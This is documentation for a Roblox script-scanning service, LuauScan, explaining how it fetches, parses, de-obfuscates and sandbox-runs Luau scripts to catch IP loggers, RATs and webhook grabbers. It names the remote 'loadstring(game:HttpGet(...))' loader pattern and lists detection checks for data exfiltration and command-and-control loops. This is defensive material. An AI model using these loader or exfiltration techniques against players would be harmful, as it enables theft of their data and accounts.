LuauScan

Documentation

How LuauScan Works

LuauScan exists for one reason: to protect Roblox players from malicious scripts. Every day, people across the Roblox community paste and run scripts they found on script hubs, in Discord servers, or through executors — and a lot of those scripts hide something nasty underneath. IP loggers that harvest your address the moment you join. RATs that quietly take remote control. Webhook grabbers that ship your data straight to an attacker. LuauScan is the VirusTotal for Roblox scripts: paste a script, a loader, or a link, and it tells you what that script actually does before you run it.

Here's what happens between the moment you hit scan and the report you get back.

1

It figures out what you gave it

Roblox scripts get shared in a lot of shapes. You might paste raw Luau, a one-line loadstring(game:HttpGet(...)) loader, a raw GitHub or Pastebin link, or a full executor script. LuauScan detects which one it is automatically. If it's a loader or a URL, it fetches the actual script the loader would pull into your Roblox game — because the danger is never in the loader line, it's in the code hiding behind it.

That fetch is done safely. LuauScan validates where every link actually points, refuses to touch internal or private addresses, and follows redirects carefully, so resolving a Roblox script link can never be turned into an attack on the service itself. Every script it pulls is fingerprinted with a SHA-256 hash, so if a script has been seen before, you get the existing analysis instantly.

Because Roblox loaders often point at links the uploader controls, LuauScan is honest about a key fact: it analyzes what a URL served at the moment you scanned it. A script host can swap the file afterward. So loader reports are stamped with the exact content hash and time, and if you re-scan a link and it now serves different code than before, LuauScan flags that change — that's often the first sign of a Roblox script that was clean when it went up and weaponized later.

2

It reads the script the way Roblox does

Roblox doesn't run plain Lua — it runs Luau, its own dialect with syntax that ordinary Lua parsers choke on. LuauScan parses real Luau, exactly as Roblox understands it, turning the script into a full structural map of every function, call, and value. Guessing with keyword searches isn't good enough for a security tool, so LuauScan works from the real structure of the code. If a script is so broken or hostile it can't be parsed at all, that itself is treated as a warning sign — never quietly ignored.

3

It looks for the behaviors that hurt Roblox players

With the script mapped out, LuauScan runs it past a battery of checks built specifically around how malicious Roblox scripts behave:

  • IP loggers and grabbersrequests to known logger services, or any outbound call fired every time a player joins, which is how attackers mass-harvest the IPs of everyone in a Roblox game.
  • RATs and command-and-controla script that repeatedly fetches code from a server and executes it in a loop, giving an attacker ongoing remote control over what your Roblox client runs.
  • Data exfiltrationDiscord webhooks and unknown outbound endpoints that ship information out of your Roblox session.
  • Roblox service and remote usagewhich Roblox services the script touches (HttpService, Players, TeleportService, MarketplaceService, and so on) and every RemoteEvent or RemoteFunction it fires, so you can see how it reaches into the game.
  • Auth and whitelist servicesmany legitimate paid Roblox scripts sit behind key systems; LuauScan recognizes these and marks them as informational, while still noting that they phone home and can serve different code to different users.

Unknown destinations are never waved away. If a Roblox script contacts a server LuauScan doesn't recognize, that's surfaced as a signal — because today's unknown host is tomorrow's logger.

4

It sees through obfuscation

A huge amount of dangerous Roblox code is obfuscated — scrambled so you can't read what it does. But obfuscation on its own isn't proof of malice: plenty of legitimate Roblox script developers obfuscate their work to stop it being stolen or resold. So LuauScan treats obfuscation as neutral and focuses on what the code actually does underneath.

It de-obfuscates in two ways. First, statically: it decodes hidden strings, unpacks encoded byte tables, and peels back nested loadstring layers to recover the real script without ever running it — so a Roblox logger URL hidden inside a string.char blob gets pulled straight out into the open. Where a payload only assembles itself at the last second, the static pass can't reach it, which is where the next stage comes in.

5

It runs the script — safely — to catch what hides at rest

This is what sets LuauScan apart from a simple code reader. Some malicious Roblox scripts only reveal their real target when they run — decrypting a logger URL with a key computed on the fly, or building a webhook address piece by piece. You can't see that by reading; you have to watch it happen.

So LuauScan runs the script in a sealed sandbox: a real Luau environment with no network and no filesystem — none of the things a malicious Roblox script needs to actually do harm. Every dangerous function is replaced with a harmless stand-in that records what the script tried to do instead of letting it happen. When the script decrypts its logger URL and tries to send your data, the sandbox writes down the real address and hands back nothing. The script reveals itself; nobody gets hurt. Anything it uncovers at runtime is run back through the same threat checks, so a logger that was invisible at rest gets caught the moment it surfaces.

The sandbox is strictly contained — a runaway or malicious Roblox script that tries to loop forever is shut down automatically, and the service stays healthy. And when a script genuinely can't be fully run, LuauScan says so plainly and marks the dynamic analysis as incomplete. It never pretends an unfinished scan is a clean one.

6

It gives you an honest verdict

Everything above rolls up into a clear report: a risk score, a plain-language explanation of what the Roblox script does, every service and remote it uses, every endpoint it contacts, the de-obfuscated source where recoverable, and a breakdown of exactly which checks fired and why. The risk is driven by real behavior — a logger, a RAT loop, an exfil call — not by superficial things like a script simply being a loader or being obfuscated, both of which are completely normal in the Roblox world.

What LuauScan does not claim

This part matters, because a security tool that overpromises is worse than none at all. LuauScan detects threats — it does not guarantee safety. No scanner can, and any tool that tells you a Roblox script is “100% safe” is lying to you. Malicious scripts can be written to detect a sandbox and stay quiet, to trigger only later, or to pull their real payload fresh from a server after you've scanned. Some harm — a backdoor that quietly hands one account admin powers in a Roblox game — looks like completely normal code and can't be spotted by any automated tool.

So LuauScan reports what it found: “no malicious indicators detected,” never “safe.” It catches the overwhelming majority of the real IP loggers, RATs, and grabbers circulating in the Roblox community, it shows its work, and it's honest about its limits. Used that way — as a strong signal, not a guarantee — it's one of the best defenses a Roblox player has against getting their account or their data stolen by a script they were about to trust.

Ready to check a script?Scan a script →